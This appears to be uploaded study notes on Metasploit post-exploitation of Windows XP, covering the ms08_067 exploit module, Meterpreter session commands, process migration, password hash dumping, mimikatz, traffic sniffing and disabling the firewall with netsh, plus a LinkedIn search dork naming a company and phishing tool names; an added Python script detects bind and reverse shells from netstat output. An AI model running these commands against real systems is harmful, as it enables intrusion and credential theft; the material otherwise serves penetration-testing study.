Meterpreter

Uploaded by ahmedemademad19
site:linkedin.com swissccom ltd

Rubber Ducky
Evilginx

deepsea email sender

-----------------------------------------
Shell Types:

Difference between bind and reverse TCP:

Bind TCP: the victim opens a port and waits for the attacker to connect.
Reverse TCP: the victim connects back to the attacker's machine, which is listening
for the connection; because the connection is outbound it can bypass the firewall.

Staged payload => the payload is sent in several stages/parts => bypass the firewall
Stageless payload => the whole payload is sent in one shot

The firewall can be enabled and disabled from both a bind and a reverse connection.

exploit/windows/smb/ms08_067_netapi

grep shell show payloads

set payload windows/shell/ => double tab

After the attack, run:

cmd> netstat -ano
cmd> tasklist /v
cmd> qwinsta => list live sessions
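The same two commands (netstat -ano and tasklist /v) are what a defender runs on a box suspected of hosting one of the shells described above. The script below is an added example, not part of these notes: it parses constructed sample output of both commands, joins sockets to their owning process, and flags a listening socket held by a process that normally never listens (bind-shell pattern) and an established outbound connection from a process that normally never talks to the network (reverse-shell pattern; a print spooler with an outbound connection is exactly what migrating into spoolsv.exe, as later in these notes, leaves behind). The allow-lists of expected processes are assumptions for the example, not a reference baseline.

```python
"""Triage of `netstat -ano` + `tasklist /v` output from a suspected compromised Windows host.

Added example, not from the original notes. All sample output below is constructed.
"""
import re
from dataclasses import dataclass

# Constructed sample: what `netstat -ano` printed on the suspect host.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       760
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING       2480
  TCP    192.168.56.101:139     0.0.0.0:0              LISTENING       4
  TCP    192.168.56.101:1041    192.168.56.1:4444      ESTABLISHED     1716
  TCP    192.168.56.101:1042    93.184.216.34:443      ESTABLISHED     1844
  UDP    0.0.0.0:500            *:*                                    620
"""

# Constructed sample: the first columns of `tasklist /v` on the same host.
TASKLIST_SAMPLE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Console                    0         28 K
System                           4 Console                    0        236 K
svchost.exe                    760 Console                    0      4,520 K
spoolsv.exe                   1716 Console                    0      5,112 K
iexplore.exe                  1844 Console                    0     22,004 K
cmd.exe                       2480 Console                    0      2,300 K
"""

# Assumption for the example: processes expected to own sockets on this host.
EXPECTED_LISTENERS = {"system", "svchost.exe", "lsass.exe", "services.exe", "wininit.exe"}
EXPECTED_CLIENTS = EXPECTED_LISTENERS | {"iexplore.exe", "firefox.exe", "chrome.exe"}

# proto, local, foreign, optional state (UDP rows have none), PID
NETSTAT_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")
# image name (may contain spaces), then PID, then the rest of the row
TASKLIST_ROW = re.compile(r"^(.+?)\s+(\d+)\s+\S")


@dataclass
class Socket:
    proto: str
    local: str
    remote: str
    state: str
    pid: int


@dataclass
class Finding:
    pid: int
    image: str
    socket: Socket
    reason: str


def parse_netstat(text: str) -> list[Socket]:
    """Return one Socket per TCP/UDP row; banner and header lines are skipped."""
    sockets = []
    for line in text.splitlines():
        m = NETSTAT_ROW.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            sockets.append(Socket(proto, local, remote, state or "", int(pid)))
    return sockets


def parse_tasklist(text: str) -> dict[int, str]:
    """Map PID -> image name from tasklist output."""
    images = {}
    for line in text.splitlines():
        if line.startswith("Image Name") or line.startswith("="):
            continue
        m = TASKLIST_ROW.match(line)
        if m:
            images[int(m.group(2))] = m.group(1).strip()
    return images


def triage(netstat_text: str, tasklist_text: str) -> list[Finding]:
    """Flag TCP sockets whose owning process is not expected to hold them."""
    images = parse_tasklist(tasklist_text)
    findings = []
    for s in parse_netstat(netstat_text):
        if s.proto != "TCP":
            continue
        if s.pid not in images:
            findings.append(Finding(s.pid, "<not in tasklist>", s, "socket owned by a PID that tasklist does not show"))
            continue
        image = images[s.pid]
        name = image.lower()
        if s.state == "LISTENING" and name not in EXPECTED_LISTENERS:
            findings.append(Finding(s.pid, image, s, "unexpected listening socket (bind-shell pattern)"))
        elif s.state == "ESTABLISHED" and name not in EXPECTED_CLIENTS:
            findings.append(Finding(s.pid, image, s, "unexpected outbound connection (reverse-shell pattern)"))
    return findings


def report(findings: list[Finding]) -> str:
    return "\n".join(
        f"PID {f.pid:>5} {f.image:<14} {f.socket.local:<22} -> {f.socket.remote:<20} {f.socket.state:<12} {f.reason}"
        for f in findings
    )


if __name__ == "__main__":
    print(report(triage(NETSTAT_SAMPLE, TASKLIST_SAMPLE)))
```

On the constructed sample this reports two rows: cmd.exe (PID 2480) listening on port 5555, and spoolsv.exe (PID 1716) with an established connection to 192.168.56.1:4444. The decision is made on the owning process rather than on port numbers, because a shell can be told to use any port but cannot easily change which image name tasklist shows for it.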

---------------------------------------
Meterpreter
Exploit Windows XP

exploit/windows/smb/ms08_067_netapi

grep meterpreter show payloads

After the connection:
sessions -i 1
> ps
> getuid
> dir
> systeminfo
---------------------
Migrate to another process
migrate <pid> => e.g. spoolsv.exe => Print Spooler service.

---------------------
Files can be downloaded:
# download file.txt
# pwd -> current path on the victim
# lpwd -> current path on the attacker

To drop from meterpreter into a cmd command line:

> shell

To send the session to the background:

> background

msf> sessions
msf> sessions -i <id>

To dump all password hashes:

> hashdump

> ?

To execute commands:
> execute -f cmd.exe

Take a screenshot:

> screenshot

Modules can be loaded for post-exploitation:

meterpreter> load => double tab

meterpreter> load mimikatz

meterpreter> ?
meterpreter> kerberos

Search the Offensive Security documentation for mimikatz.

meterpreter> load sniffer

meterpreter> ?
meterpreter> sniffer_interfaces

meterpreter> sniffer_start <interface_id>

Then generate some traffic (e.g. ping) on the XP machine.

meterpreter> sniffer_stats 1
meterpreter> sniffer_dump 1 /home/kali/hack.pcap
meterpreter> load espia => for screenshots
meterpreter> screengrab

---------------------------------------

Stop the firewall
meterpreter> shell
system32> netsh firewall set opmode mode=DISABLE
system32> netsh firewall set opmode mode=ENABLE
